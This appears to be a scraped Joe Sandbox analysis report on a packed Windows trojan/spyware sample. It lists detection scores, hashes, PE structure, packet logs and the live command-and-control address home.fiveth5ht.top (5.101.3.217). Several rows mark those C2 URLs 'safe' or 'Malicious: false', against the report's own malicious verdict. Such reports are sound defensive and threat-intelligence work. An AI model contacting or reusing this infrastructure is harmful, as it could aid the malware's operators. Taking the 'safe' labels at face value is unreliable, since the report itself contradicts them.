Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
BkB1ur7aFW.exe47%ReversingLabsWin32.Trojan.Generic
BkB1ur7aFW.exe100%AviraTR/Crypt.TPM.Gen
BkB1ur7aFW.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862j0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0oot%0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0false
        		high
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
          		high
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.htmlBkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862jBkB1ur7aFW.exe, 00000000.00000002.2025901050.00000000016FE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://html4/loose.dtdBkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://curl.se/docs/alt-svc.html#BkB1ur7aFW.exefalse
                    		high
                    https://httpbin.org/ipbeforeBkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/http-cookies.htmlBkB1ur7aFW.exe, BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://curl.se/docs/hsts.html#BkB1ur7aFW.exefalse
                          		high
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSBkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            https://curl.se/docs/http-cookies.html#BkB1ur7aFW.exefalse
                              		high
                              https://curl.se/docs/alt-svc.htmlBkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.cssBkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://.jpgBkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0oot%BkB1ur7aFW.exe, 00000000.00000003.1987530704.0000000001732000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2026953073.0000000001734000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    34.226.108.155
                                    		httpbin.orgUnited States
                                    		14618AMAZON-AESUSfalse
                                    5.101.3.217
                                    		home.fiveth5ht.topRussian Federation
                                    		34665PINDC-ASRUfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1581386
                                    Start date and time:2024-12-27 14:52:07 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 14s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:4
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:BkB1ur7aFW.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:5fad6c65b553ca73463694390e2f9301.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: BkB1ur7aFW.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    34.226.108.1555uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                      3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                          8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                            mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                              HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                                vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                                  jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                                                    qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                                                      gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                                        5.101.3.217OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        home.fiveth5ht.topOoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        httpbin.orgOoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        PINDC-ASRU5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                        • 5.101.3.217
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        AMAZON-AESUS5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                        • 34.226.108.155
                                                        db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                        • 34.195.210.183
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.984233838978896
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • VXD Driver (31/22) 0.00%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:BkB1ur7aFW.exe
                                                        File size:4'426'752 bytes
                                                        MD5:5fad6c65b553ca73463694390e2f9301
                                                        SHA1:7a624d02450205c7a89d6397979486873b47be39
                                                        SHA256:bad2c4c499a3bb89e8098f5fe7b43cdb248d6e70bb23a07de1ebb83fac880175
                                                        SHA512:a8c971d1434c65dc0ee32fca2b4521ca1f86b1784b75fbef557fca7174fa0344204fd9512212dd4c8214a1d6f103c7f955df60eba13bc45a27e8ad844a391c47
                                                        SSDEEP:98304:kqfzsA9ZrTeQtxk/DZvun9EaAN8rvlEUOm+ZpvM5xevOH:kqwA9RTIDp8ma9NkPpk5o0
                                                        TLSH:7E2633C8916117A9C10681B79E27509DFFAAE97D33E744F92CA1F431118FC69B08EEC9
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@.................................x0D...@... ............................

                                                        File Icon

                                                        Icon Hash:90cececece8e8eb0

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x100c000
                                                        Entrypoint Section:.taggant
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                        DLL Characteristics:DYNAMIC_BASE
                                                        Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                        Authenticode Signature

                                                        Signature Valid:
                                                        Signature Issuer:
                                                        Signature Validation Error:
                                                        Error Number:
                                                        Not Before, Not After
                                                          Subject Chain
                                                            Version:
                                                            Thumbprint MD5:
                                                            Thumbprint SHA-1:
                                                            Thumbprint SHA-256:
                                                            Serial:

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp 00007FD13D14329Ah
                                                            punpckhdq mm0, qword ptr [ebx+00h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007FD13D145295h
                                                            add byte ptr [0000000Ah], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [0000000Ah], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [ecx+00000080h], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax+eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0a3a40x10gjdrirkr
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc0a3540x18gjdrirkr
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x6db0000x288a00eaf66eb70c3eefdee7b49964574cc058unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x6dc0000x1ac0x2007d68f4cff1ad50018c73c464b14fdc91False0.580078125data4.553686270674705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            0x6de0000x3800000x20099264c5ec7320ed6da2e4754b91d6d8funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            gjdrirkr0xa5e0000x1ad0000x1ac600795ff55d1e1a7e00a8f8b31ec4f232deFalse0.9943839819813248data7.954844497774828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            agpnebbv0xc0b0000x10000x400fb1a4b68cbc80eb2349c28614bcc03d1False0.8134765625data6.233280855253831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0xc0c0000x30000x22007a2a3a8386ae5bb1e0a760a7980f66c3False0.06767003676470588DOS executable (COM)0.7359956789870232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0xc0a3b40x152ASCII text, with CRLF line terminators0.6479289940828402

                                                            Imports

                                                            DLLImport
                                                            kernel32.dlllstrcpy

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 27, 2024 14:53:16.491015911 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:16.491070986 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:16.491146088 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:16.535944939 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:16.535965919 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:18.339895964 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:18.340550900 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:18.340593100 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:18.342068911 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:18.342196941 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:18.343781948 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:18.343888998 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:18.354973078 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:18.355005026 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:18.401753902 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:19.141382933 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:19.141526937 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:19.141588926 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:19.159692049 CET49730443192.168.2.434.226.108.155
                                                            Dec 27, 2024 14:53:19.159723997 CET4434973034.226.108.155192.168.2.4
                                                            Dec 27, 2024 14:53:22.375021935 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.494564056 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.494899035 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.495835066 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.615459919 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.615477085 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.615530968 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.615570068 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.615591049 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.615638971 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.615648985 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.615689039 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.615770102 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.615781069 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.615813017 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.615830898 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.615883112 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.615911007 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.615925074 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.615957975 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.616081953 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.616101027 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.616132021 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.616163969 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.735244989 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.735260010 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.735307932 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.735332966 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.735340118 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.735364914 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.735390902 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.735443115 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.735548973 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.781594992 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.781721115 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.901473999 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.901592016 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:22.941521883 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:22.941593885 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.061131001 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.061247110 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.221498966 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.221582890 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.421631098 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.421710014 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.584440947 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.584635973 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.584737062 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704354048 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704368114 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704380989 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704413891 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704457045 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704468012 CET80497315.101.3.217192.168.2.4
